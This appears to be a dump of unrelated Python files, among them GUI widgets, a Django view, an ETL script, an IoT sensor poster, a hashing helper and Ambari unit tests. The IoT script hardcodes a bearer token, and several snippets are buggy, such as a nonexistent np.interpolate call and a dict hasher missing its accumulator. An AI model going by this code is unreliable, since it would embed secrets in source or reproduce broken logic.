grads = optimizer.compute_gradients(total_loss, tf.trainable_variables())
training_op = optimizer.apply_gradients(grads, global_step=global_step)
return training_op, global_step, grads
|
import pygame
from color import Color
from settings import Settings
class Button:
def __init__(self, surface, coords, size, bg_color, text, function, *args):
self.surface = surface
self.coords = coords
self.width, self.height = size
self.bg_color = bg_color
# self.border_color = Settings.BUTTON_BORDER_COLOR
self.border_color = None
self.hover_color = Color.shade_color(
self.bg_color, Settings.COLOR_SHADE / 2)
self.inactive_color = Color.shade_color(
self.bg_color, -Settings.COLOR_SHADE)
self.hovered = False
self.text = text
self.active = True
self.function = function
self.args = args
self.font = pygame.font.SysFont(
'Consolas', Settings.BUTTON_TEXT_SIZE, bold=True)
@property
def x(self):
return self.coords()[0] if callable(self.coords) else self.coords[0]
@property
def y(self):
return self.coords()[1] if callable(self.coords) else self.coords[1]
@property
def coords_4(self):
return self.x, self.y, self.width, self.height
def update(self):
if self.active:
cursor = pygame.mouse.get_pos()
if self.x < cursor[0] < self.x + self.width and self.y < cursor[1] < self.y + self.height:
self.hovered = True
else:
self.hovered = False
def draw(self):
if not self.active:
color = self.inactive_color
# border_color = None
elif self.hovered:
color = self.hover_color
# border_color = self.border_color
else:
color = self.bg_color
# border_color = None
pygame.draw.rect(self.surface, color, self.coords_4)
# if border_color is not None:
# pygame.draw.rect(self.surface, self.border_color, self.coords_4, 2)
self.show_text()
def show_text(self):
if self.text is not None:
string = self.text() if callable(
self.text) else self.text
text_color = Settings.BUTTON_TEXT_COLOR if self.active else Settings.BUTTON_TEXT_INACTIVE_COLOR
text = self.font.render(string, True, text_color)
text_size = text.get_size()
text_x = self.x + (self.width / 2) - (text_size[0] / 2)
text_y = self.y + (self.height / 2) - (text_size[1] / 2)
self.surface.blit(text, (text_x, text_y))
def click(self):
if self.function is not None and callable(self.function):
self.function(*self.args)
class ButtonFactory:
@staticmethod
def create_button(surface, pos, color, text, function, *args):
return Button(surface, pos, Settings.BUTTON_SIZE,
color, text, function, *args)
@staticmethod
def create_button_centered(settings_instance, surface, color, text, function, *args):
return ButtonFactory.create_button(surface, settings_instance.BUTTON_POS_CENTER,
color, text, function, *args)
|
# Better Solution:
# https://www.acmicpc.net/source/13139101
N = int(input())
cute = 0
for _ in range(N):
if input() == '1':
cute += 1
if cute > N//2:
print('Junhee is cute!')
else:
print('Junhee is not cute!')
|
from django.shortcuts import render
from rest_framework import status, viewsets
from .models import Dog
from .serializers import DogSerializer
# Create your views here.
class DogView(viewsets.ModelViewSet):
queryset = Dog.objects.all()
serializer_class = DogSerializer |
import timeit
loops = 1_000_000
val = timeit.timeit("""to_rna("ACGTGGTCTTAA")""",
"""
LOOKUP = str.maketrans("GCTA","CGAU")
def to_rna(dna_strand):
return dna_strand.translate(LOOKUP)
""", number=loops) / loops
print(f"translate maketrans: {val}")
val = timeit.timeit("""to_rna("ACGTGGTCTTAA")""",
"""
LOOKUP = {"G": "C", "C": "G", "T": "A", "A": "U"}
def to_rna(dna_strand):
return ''.join(LOOKUP[chr] for chr in dna_strand)
""", number=loops) / loops
print(f"dictionary join: {val}")
|
import numpy as np
import numpy.ma as ma
import warnings
from moMetrics import BaseMoMetric
__all__ = ['ValueAtHMetric']
class ValueAtHMetric(BaseMoMetric):
"""
Return the value of a metric at a given H.
"""
def __init__(self, Hmark=22, **kwargs):
metricName = 'Value At H=%.1f' %(Hmark)
super(ValueAtHMetric, self).__init__(metricName=metricName, **kwargs)
self.Hmark = Hmark
def run(self, metricVals, Hvals):
# Check if desired H value is within range of H values.
if (self.Hmark < Hvals.min()) or (self.Hmark > Hvals.max()):
warnings.warn('Desired H value of metric outside range of provided H values.')
return None
nHvals = len(Hvals)
nHMetricVals = metricVals.shape[1]
if nHvals == nHMetricVals:
# Hvals matched the points where the metric values were calculated (clone H distribution).
eps = 1.0e-6
# Hvals is an array used for each metric value,
# we have to pick out the particular metricValues to use.
diffs = np.abs(self.Hmark - Hvals)
Hidx = np.where(diffs == diffs.min())[0]
result = metricVals.swapaxes(0,1)[Hidx]
Hmark = Hvals[Hidx]
self.name = 'Value At H=%.1f' %(Hmark)
else:
# We have a range of metric values, one per Hval.
result = np.interpolate([self.Hmark], Hvals, metricVals.swapaxes(0, 1))
return result
|
import unrealsdk
from builtins import tuple as _tuple
def get_player_controller():
"""
Get the current WillowPlayerController Object.
:return: WillowPlayerController
"""
return unrealsdk.GetEngine().GamePlayers[0].Actor
def get_obj_path_name(object):
"""
Get the full correct name of the provided object.
:param object: UObject
:return: String of the Path Name
"""
if object:
return object.PathName(object)
else:
return "None"
def console_command(command, bWriteToLog=False):
"""
Executes a normal console command
:param command: String, the command to execute.
:param bWriteToLog: Bool, write to Log
:return: None
"""
get_player_controller().ConsoleCommand(command, bWriteToLog)
def obj_is_in_class(obj, inClass):
"""
Compares the given Objects class with the given class.
:param obj: UObject
:param inClass: String, the Class to compare with
:return: Bool, whether or not it's in the Class.
"""
return bool(obj.Class == unrealsdk.FindClass(inClass))
def get_weapon_holding():
"""
Get the weapon the WillowPlayerPawn is currently holding.
:return: WillowWeapon
"""
return unrealsdk.GetEngine().GamePlayers[0].Actor.Pawn.Weapon
def get_world_info():
return unrealsdk.GetEngine().GetCurrentWorldInfo()
def tuple(iteratable):
if isinstance(iteratable, unrealsdk.FVector) or \
isinstance(iteratable, unrealsdk.FStruct) or \
isinstance(iteratable, unrealsdk.FRotator):
if iteratable.X is not None:
if iteratable.Z is not None:
return iteratable.X, iteratable.Y, iteratable.Z
return iteratable.X, iteratable.Y
return iteratable.Pitch, iteratable.Yaw, iteratable.Roll
return _tuple(iteratable)
|
# The following formula can be used to determine the distance an object falls
# due to gravity in a specific time period, starting from rest:
# d = 1⁄2 gt^2
# The variables in the formula are as follows: d is the distance in meters, g is
# 9.8, and t is the amount of time in seconds, that the object has been falling.
# Write a function named falling_distance that accepts an object’s falling time
# in seconds as an argument. The function should return the distance in meters
# that the object has fallen during that time interval. Write a program that
# calls the function in a loop that passes the values 1 through 10 as arguments
# and displays the return value.
def main():
# Display the falling distance for 1 through 10 seconds
for time in range(1,11):
print("Second/s: ", time, " Fall Distance: ", falling_distance(time))
# This function will accept an int argument t that
# represents a time in seconds
# This distance an object falls in that time will be returned
def falling_distance(t):
return .5 * 9.8 * t**2
main()
|
# Вводятся три разных числа. Найти, какое из них является средним (больше одного, но меньше другого).
n_1 = float(input('Введите первое число: '))
n_2 = float(input('Введите второе число: '))
n_3 = float(input('Введите третье число: '))
if n_2 < n_1 < n_3 or n_3 < n_1 < n_2:
print(f'{n_1} является средним числом')
elif n_1 < n_2 < n_3 or n_3 < n_2 < n_1:
print(f'{n_2} является средним числом')
else:
print(f'{n_3} является средним числом') |
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""
" Load the data from 2 csv files
"
" Args:
" messages_filepath: file path of the csv file containing the messages
" categories_filepath: file path of the csv file containing the categories
"
" Returns:
" a dataframe
"
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = pd.merge(messages, categories, on='id')
return df
def clean_data(df):
"""
" clean a dataframe to make it ready for machine learning algorithm
"
" Args:
" df: the dataframe to clean
"
" Returns:
" df: the cleaned dataframe
"
"""
# split categories into separate columns
df.iloc[:,4].str.split(";", expand=True)
df = pd.concat([df,df.iloc[:,4].str.split(";", expand=True)],axis=1)
columns_names = ['id', 'message', 'original', 'genre', 'categories']
for i in range(0,36):
columns_names.append(df.iloc[0,i+5].split("-")[0])
df.columns = columns_names
for col_name in columns_names:
if col_name not in ['id', 'message', 'original', 'genre', 'categories']:
df[col_name] = df[col_name].str.split("-", expand=True)[1]
df[col_name] = pd.to_numeric(df[col_name])
df = df.drop(['categories'], axis=1)
# drop duplicates
df.drop_duplicates(inplace=True)
df.related.replace(2,1, inplace=True)
return df
def save_data(df, database_filename):
"""
" save a dataframe to a database
"
" Args:
" df: the dataframe to save
" database_filename: the name of the file containing the database
"
" Returns:
" nothing
"
"""
engine = create_engine('sqlite:///' + database_filename)
df.to_sql('Disaster_Response', engine, index=False)
def main():
"""
" main function. Load data from command line arguments, clean it,
" save it into a database
"
" Args:
" none
"
" Returns:
" nothing
"
"""
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main()
|
import requests
import random
import time
host = 'http://localhost'
port = '8443'
urlTemp = '/iot/temperature'
sensor1 = "28ff88b893160585"
sensor2 = "28ff6ef293160466"
token = '5ccf1c4c-90d8-42e5-8338-ad4d40f677b2'
#token = '748d34a0-67d6-4232-aa00-0263a4112ef7'
hed = {'Authorization': 'Bearer ' + token}
def request(sensor_id):
response = requests.post(host + ':' + port + urlTemp, None,
{'value': random_temp(), 'sensorId': sensor_id, 'deviceId': 'ccc'}, headers=hed)
print(response)
def random_temp():
return "%2.2f" % ((random.random() * 100) % 2 + 19)
if __name__ == '__main__':
while True:
print('sent temp')
request(sensor1)
request(sensor2)
time.sleep(5)
|
#!/usr/bin/python
"""
Hashing of plain data types
Hopefully there's better way to do this
"""
import struct
import hashlib
from dataclasses import fields, is_dataclass
def merklize(x):
"""
Calculate hash of value
"""
acc = hashlib.sha256()
merklize_rec(acc, x)
return acc.digest()
def merklize_rec(acc, x):
"""
Hash given value. Hash is constructed incrementally using given
accumulator from hashlib
"""
ty = type(x)
acc.update( ty.__module__.encode('utf-8') )
acc.update( ty.__name__.encode('utf-8') )
if is_dataclass(ty) :
for nm in sorted([ f.name for f in fields(ty) ]):
acc.update(nm.encode('utf-8'))
merklize_rec(acc, x.__dict__[nm])
else:
lookup[ty](acc, x)
def hashing_bs(to_bs):
"Compute hash of value using given serialization function"
return lambda acc, x: acc.update(to_bs(x))
def hashing_list(acc, xs):
"Hash list"
for x in xs:
merklize_rec(acc, x)
def hashing_dict(acc, xs):
"Hash dictionary"
for k,v in sorted(xs.items()):
merklize_rec(k)
merklize_rec(v)
# Lookup table or hashing algorithms
lookup = {
type(None): lambda bs,x: None,
bytearray: hashing_bs(lambda x: x),
bool: hashing_bs(lambda b: struct.pack('b', b)),
int: hashing_bs(lambda i: struct.pack('l', i)),
float: hashing_bs(lambda x: struct.pack('d', x)),
str: hashing_bs(lambda s: s.encode('utf-8')),
# Containers
list: hashing_list,
dict: hashing_dict,
}
|
from flask import Flask, jsonify, request
import Calculations
app = Flask(__name__)
@app.route('/identification', methods=["POST"])
def faces():
result = Calculations.recognition(request.get_json(force = True))
return jsonify(result)
if __name__ == '__main__':
app.run(debug = True, port=5000)
|
def Chess():
h=int(input('Please specify the number of sections in the horizontal direction : '))
v=int(input('Please specify the number of sections in the vertical direction : '))
for i in range(v):
for j in range(h):
if (i+j) % 2==1:
print('#',end='')
else:
print('*',end='')
print()
Chess() |
class Node:
def __init__(self,name):
"""The method does not have to test the validity of name."""
self.name = name # the .name. of the node
hash(name) # name can be any immutable object,
# most naturally a string or a number.
self.neighbors=dict() # a dictionary of the neighbors with the neighbors.
# names as keys and the weights of the corresponding
# edges as values.
def __hash__(self):
return hash(self.name)
def __str__(self):
return str(self.name)
def __len__(self):
"""
:return:the number of neighbors
"""
return len(self.neighbors)
def __eq__(self, other):
"""
:param other: based on the name attribute
:return: bool
"""
#based on the name attribute
return self.name == Node(other).name
def __ne__(self, other):
"""
:param other: based on the name attribute
:return: bool
"""
return self.name != other.name
def is_neighbor(self, name):
"""
:param name:
:return: True if name is a neighbor of self.
"""
return name in self.neighbors
def add_neighbor(self, other, weight=1):
"""
adds name as a neighbor of self.
This method does not test whether a node named name exists.
This method does not allow adding a neighbor with a name of
an existing neighbor.
This method does not allow adding a neighbor with the same name as self.
:param other:
:param weight: somthing that can be converted into float (negative or positive)
:return:
"""
if other == self:
raise NameError("Node can not be neighbor of itself."+str(self))
if self.is_neighbor(other):
raise ValueError("This Node is already a neighbor: " + str(other) +
" with weight:" + str(self.neighbors[other]))
# I allow negative values
self.neighbors[other]=float(weight)
def copy_neighbors_of(self,node):
"""
copies only non exists neighbors from node
:param node:
:return:
"""
for neighbor in node.neighbors:
if neighbor not in self.neighbors:
self.add_neighbor(neighbor,node.get_weight(neighbor))
def remove_neighbor(self, other):
"""
removes name from being a neighbor of self.
This method does not test whether a node named name exists.
This method should not fail if name is not a neighbor of self.
"""
self.neighbors.pop(other)
def get_weight(self, name):
"""
This method return None if name is not a neighbor of self.
:param name:
:return: returns the weight of the relevant edge.
"""
return self.neighbors[name]
def get_total_weight(self):
return sum(self.neighbors.values())
def is_isolated(self):
"""
returns True if self has no neighbors
"""
return len(self.neighbors)==0
def get_edges(self):
return map(lambda (n,w): (str(self),str(n),w),self.neighbors.items() )
def get_neighbors_names(self):
return self.neighbors
def dump(self,indentation='\t'):
prefix="node {:>4}:".format(str(self))
if self.is_isolated():
return prefix+ " is_isolated!"
edges=map(lambda n : " -->{:>2} : w={:>4}".format(n,self.get_weight(n)),
self.neighbors)
seperator="\n {}".format(indentation)
return prefix+seperator+seperator.join(edges)
|
import PySimpleGUI as sg
from easychat_package import base64files
#the first host/join screen
def choice():
global logo
logo=base64files.static_logo
global window
global event
sg.theme("light purple")
layout = [[sg.Image(data=logo)],
[sg.Button('Host (as Server)'), sg.Button('Join (as Client)')]]
window = sg.Window('easyChat', layout, grab_anywhere=True, icon=r"D:\Downloads\ec2.ico")
event, values = window.read() # Read the event that happened and the values dictionary.
if event == sg.WIN_CLOSED: # If user closed window with X
exit()
#entering server name/creds
def server_gui():
global logo
logo=base64files.static_logo
global server_name
global server_pwd
layout = [[sg.Image(data=logo, size=(400,400))],
[sg.Text('Enter your name, Server',justification='center',size=(50,1))],
[sg.InputText("Dorian",size=(57,1), key="-name-")],
[sg.Text('...',justification='center',size=(50,1))],
[sg.Text('Enter your sql credentials',justification='center',size=(50,1))],
[sg.Text(' If this is your first time hosting on this device, we will create a new',justification='center',size=(50,1))],
[sg.Text('databse called <easychat>,',justification='center',size=(50,1))],
[sg.Text('and within it two new tables for the purposes of this program.',justification='center',size=(50,1))],
[sg.Text('If not, we will use the dababase and tables created on the first use.',justification='center',size=(50,1))],
[sg.InputText(size=(57,1),key="-pwd-")],
[sg.Submit('Log in',size=(50,1))]]
sg.theme('Light Purple')
window = sg.Window('easyChat', layout)
event, values = window.read()
if event == sg.WIN_CLOSED:
exit()
window.close(); del window
server_name = values["-name-"] or "Server"
global server_pwd
server_pwd=str(values["-pwd-"])
#waiting for client to join
def conn_wait(host):
global window
layout=[[sg.Text(f"Server will start on host: {host} and port: 2903",size=(50,1))],
[sg.Text("Binded all IPv4 to 2903.",size=(50,1))],
[sg.Text("Waiting for incoming connections",size=(50,1))],
[sg.Image(r"media/purpleload.gif",key="-GIF-",background_color="black")], #I haven't used a base64 string for this since gif base64s are just way too long.
[sg.Button("Cancel")]]
sg.theme('Light Purple')
window = sg.Window('easyChat', layout)
def conn_popup(addr):
sg.popup_no_buttons(addr, "has connected to the server, and is now online.", keep_on_top=True, no_titlebar=True,auto_close=True,auto_close_duration=2)
def client_gui():
global logo
logo=base64files.static_logo
global client_name_encoded
global client_name
global host
global port
layout = [[sg.Image(data=logo,size=(400,400))],[sg.Text('Enter your name, client.',justification='center',size=(50,1))],
[sg.InputText("Client",size=(57,1), key="-clientname-")],
[sg.Text("Host ",justification='center'), sg.InputText(key="-host-", size=(50,1))],
[sg.Text("Port ",justification='center'), sg.InputText("2903",key="-port-",size=(51,1))],
[sg.Submit(size=(50,1))]]
sg.theme('Light Purple')
window = sg.Window('easyChat', layout)
event, values = window.read()
if event == sg.WIN_CLOSED:
exit()
window.close(); del window
client_name = values["-clientname-"] or "Client"
client_name_encoded=client_name.encode()
host=values["-host-"] or "192.168.1.5"
port=int(values["-port-"] or 2903) |
from django.urls import path
from . import views
urlpatterns = [
path('register', views.UserRegistrationView.as_view(), name = "registerUser"),
# path('login', views.Userlogin.as_view(), name = "loginUser"),
path('deleteUser', views.FormatUser.as_view(), name = "formatuser"),
path('test', views.Testing.as_view(), name = "loginUser"),
]
|
from modules.database.models.ot_list_t import List
from modules.database.base import Session
def find_lists_by_board_id(board_id):
session = Session()
result = session.query(List).filter_by(board_id=board_id)
return result
def add_list(li):
if not isinstance(li, List):
return
status_code = 201
session = Session()
try:
session.add(li)
except:
session.rollback()
status_code = 409
finally:
session.commit()
id = li.id
session.close()
return status_code, id
def update_list(li):
if not isinstance(li, List) or li.id is None:
return
status_code = 200
session = Session()
try:
old_list = session.query(List).filter_by(id=li.id).first()
old_list.name = li.name
except:
session.rollback()
status_code = 409
finally:
session.commit()
id = li.id
session.close()
return status_code, id
|
#!/usr/bin/env python3
# NOTE: Config for changing the joint efforts.
PACKAGE = "panda_gazebo"
from dynamic_reconfigure.parameter_generator_catkin import (ParameterGenerator,
double_t)
gen = ParameterGenerator()
# Generate arm effort control parameters.
arm = gen.add_group("arm")
arm.add("joint1_effort", double_t, 0, "Joint 1 effort control command", 0, -87.0, 87.0)
arm.add("joint2_effort", double_t, 1, "Joint 2 effort control command", 0, -87.0, 87.0)
arm.add("joint3_effort", double_t, 2, "Joint 3 effort control command", 0, -87.0, 87.0)
arm.add("joint4_effort", double_t, 3, "Joint 4 effort control command", 0, -87.0, 87.0)
arm.add("joint5_effort", double_t, 4, "Joint 5 effort control command", 0, -12.0, 12.0)
arm.add("joint6_effort", double_t, 5, "Joint 6 effort control command", 0, -12.0, 12.0)
arm.add("joint7_effort", double_t, 6, "Joint 7 effort control command", 0, -12.0, 12.0)
# Generate hand effort control parameters.
hand = gen.add_group("hand")
hand.add(
"width",
double_t,
7,
"Gripper width",
0,
0.0,
0.08,
)
hand.add(
"speed",
double_t,
8,
"Gripper speed",
0.2,
0.0,
0.2,
)
# Generate the necessary files and exit the program.
exit(gen.generate(PACKAGE, "panda_test", "JointEffort"))
|
from csv_comparison_package import Compare
from csv_comparison_package import Field
from csv_comparison_package import header_validator
from csv_comparison_package.decorator import call_each
from csv_comparison_package import data_exporter
@call_each
def write_duplicate_column_name(comparable: Compare):
current_column = comparable.duplicate_column_start
duplicate_headers = header_validator.get_duplicate_column_name(comparable)
for index, header_name in enumerate(duplicate_headers):
Compare.worksheet_master.write(2, current_column,
header_name[Field.column_name.value],
data_exporter.select_format_left_or_bottom(comparable,
index))
current_column += 1
|
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ambari_agent import main
main.MEMORY_LEAK_DEBUG_FILEPATH = "/tmp/memory_leak_debug.out"
import os
import logging
from unittest import TestCase
from mock.mock import Mock, MagicMock, patch
from resource_management.libraries.functions import mounted_dirs_helper
from resource_management.core.logger import Logger
from resource_management.core.exceptions import Fail
from resource_management import Directory
from resource_management.libraries.script.script import Script
class StubParams(object):
"""
Dummy class to fake params where params.x performs a get on params.dict["x"]
"""
def __init__(self):
self.dict = {}
def __getattr__(self, name):
return self.dict[name]
def __repr__(self):
name = self.__class__.__name__
mocks = set(dir(self))
mocks = [x for x in mocks if not str(x).startswith("__")] # Exclude private methods
return "<StubParams: {0}; mocks: {1}>".format(name, str(mocks))
def fake_create_dir(directory):
"""
Fake function used as function pointer.
"""
print "Fake function to create directory {0}".format(directory)
@patch.object(Script, "get_config", new=MagicMock(return_value={'configurations':{'cluster-env': {'ignore_bad_mounts': False, 'manage_dirs_on_root': True, 'one_dir_per_partition': False}}}))
class TestDatanodeHelper(TestCase):
"""
Test the functionality of the dfs_datanode_helper.py
"""
logger = logging.getLogger('TestDatanodeHelper')
grid0 = "/grid/0/data"
grid1 = "/grid/1/data"
grid2 = "/grid/2/data"
params = StubParams()
params.data_dir_mount_file = "/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist"
params.dfs_data_dir = "{0},{1},{2}".format(grid0, grid1, grid2)
params.hdfs_user = "hdfs_test"
params.user_group = "hadoop_test"
@patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
@patch.object(Logger, "warning")
@patch.object(Logger, "info")
@patch.object(Logger, "error")
def test_normalized(self, log_error, log_info, warning_info, dir_mock):
"""
Test that the data dirs are normalized by removing leading and trailing whitespace, and case sensitive.
"""
params = StubParams()
params.data_dir_mount_file = "/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist"
params.dfs_data_dir = "/grid/0/data , /grid/1/data ,/GRID/2/Data/"
# Function under test
mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, params.dfs_data_dir, params.data_dir_mount_file, update_cache=False)
for (name, args, kwargs) in log_info.mock_calls:
print args[0]
for (name, args, kwargs) in log_error.mock_calls:
print args[0]
log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /grid/0/data")
log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /grid/1/data")
log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /GRID/2/Data/")
self.assertEquals(0, log_error.call_count)
@patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
@patch.object(Logger, "info")
@patch.object(Logger, "warning")
@patch.object(Logger, "error")
@patch.object(mounted_dirs_helper, "get_dir_to_mount_from_file")
@patch.object(mounted_dirs_helper, "get_mount_point_for_dir")
@patch.object(os.path, "isdir")
@patch.object(os.path, "exists")
def test_grid_becomes_unmounted(self, mock_os_exists, mock_os_isdir, mock_get_mount_point,
mock_get_data_dir_to_mount_from_file, log_error, log_warning, log_info, dir_mock):
"""
Test when grid2 becomes unmounted
"""
mock_os_exists.return_value = True # Indicate that history file exists
# Initially, all grids were mounted
mock_get_data_dir_to_mount_from_file.return_value = {self.grid0: "/dev0", self.grid1: "/dev1", self.grid2: "/dev2"}
# Grid2 then becomes unmounted
mock_get_mount_point.side_effect = ["/dev0", "/dev1", "/"] * 2
mock_os_isdir.side_effect = [False, False, False] + [True, True, True]
# Function under test
mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, self.params.dfs_data_dir, self.params.data_dir_mount_file, update_cache=False)
for (name, args, kwargs) in log_info.mock_calls:
print args[0]
error_logs = []
for (name, args, kwargs) in log_error.mock_calls:
error_logs.append(args[0]) # this is a one-tuple
error_msg = "".join(error_logs)
self.assertEquals(1, log_error.call_count)
self.assertTrue("Directory /grid/2/data became unmounted from /dev2 . Current mount point: / ."
" Please ensure that mounts are healthy. If the mount change was intentional, you can update the contents of "
"/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist." in error_msg)
@patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
@patch.object(Logger, "info")
@patch.object(Logger, "warning")
@patch.object(Logger, "error")
@patch.object(mounted_dirs_helper, "get_dir_to_mount_from_file")
@patch.object(mounted_dirs_helper, "get_mount_point_for_dir")
@patch.object(os.path, "isdir")
@patch.object(os.path, "exists")
def test_grid_becomes_remounted(self, mock_os_exists, mock_os_isdir, mock_get_mount_point,
mock_get_data_dir_to_mount_from_file, log_error, log_warning, log_info, dir_mock):
"""
Test when grid2 becomes remounted
"""
mock_os_exists.return_value = True # Indicate that history file exists
# Initially, all grids were mounted
mock_get_data_dir_to_mount_from_file.return_value = {self.grid0: "/dev0", self.grid1: "/dev1", self.grid2: "/"}
# Grid2 then becomes remounted
mock_get_mount_point.side_effect = ["/dev0", "/dev1", "/dev2"] * 2
mock_os_isdir.side_effect = [False, False, False] + [True, True, True]
# Function under test
mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, self.params.data_dir_mount_file, self.params.data_dir_mount_file, update_cache=False)
for (name, args, kwargs) in log_info.mock_calls:
print args[0]
for (name, args, kwargs) in log_error.mock_calls:
print args[0]
self.assertEquals(0, log_error.call_count)
def test_get_mounts_with_multiple_data_dirs(self):
self.assertEquals([], mounted_dirs_helper.get_mounts_with_multiple_data_dirs(["/", "/hodoop", "/tmp"], "/hadoop/data,/tmp"))
self.assertEquals([("/", ["/hadoop/data", "/tmp"])], mounted_dirs_helper.get_mounts_with_multiple_data_dirs(["/"], "/hadoop/data,/tmp"))
def test_may_manage_folder(self):
# root, no history file, manage_dirs_on_root = True
# folder should be managed
dirs_unmounted=set()
self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = True, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set())
# root, no history file, manage_dirs_on_root = False
# folder should not be managed
dirs_unmounted=set()
self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set(['/grid/0/data']))
# non root, no history file, manage_dirs_on_root = False
# folder should be managed
dirs_unmounted=set()
self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=True, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set())
# unmounted to root, manage_dirs_on_root = True
# folder should not be managed
dirs_unmounted=set()
self.assertEquals(False, mounted_dirs_helper._may_manage_folder('/grid/0/data', '/grid/0', True, dirs_unmounted, [], False, '/'))
self.assertEquals(dirs_unmounted, set(['/grid/0/data']))
# unmounted to root, manage_dirs_on_root = False
# folder should not be managed
dirs_unmounted=set()
self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/grid/0/data', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set(['/grid/0/data']))
# same mount = root, manage_dirs_on_root = False
# folder should not be managed
dirs_unmounted=set()
self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set())
# same mount = root, manage_dirs_on_root = True
# folder should be managed
dirs_unmounted=set()
self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = True, curr_mount_point = '/'))
self.assertEquals(dirs_unmounted, set())
# mount changed to non root, manage_dirs_on_root = False
# folder should not be managed
dirs_unmounted=set()
self.assertEquals(False, mounted_dirs_helper._may_manage_folder('/grid/0/data', '/', True, dirs_unmounted, [], False, '/grid/0'))
self.assertEquals(dirs_unmounted, set(['/grid/0/data']))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.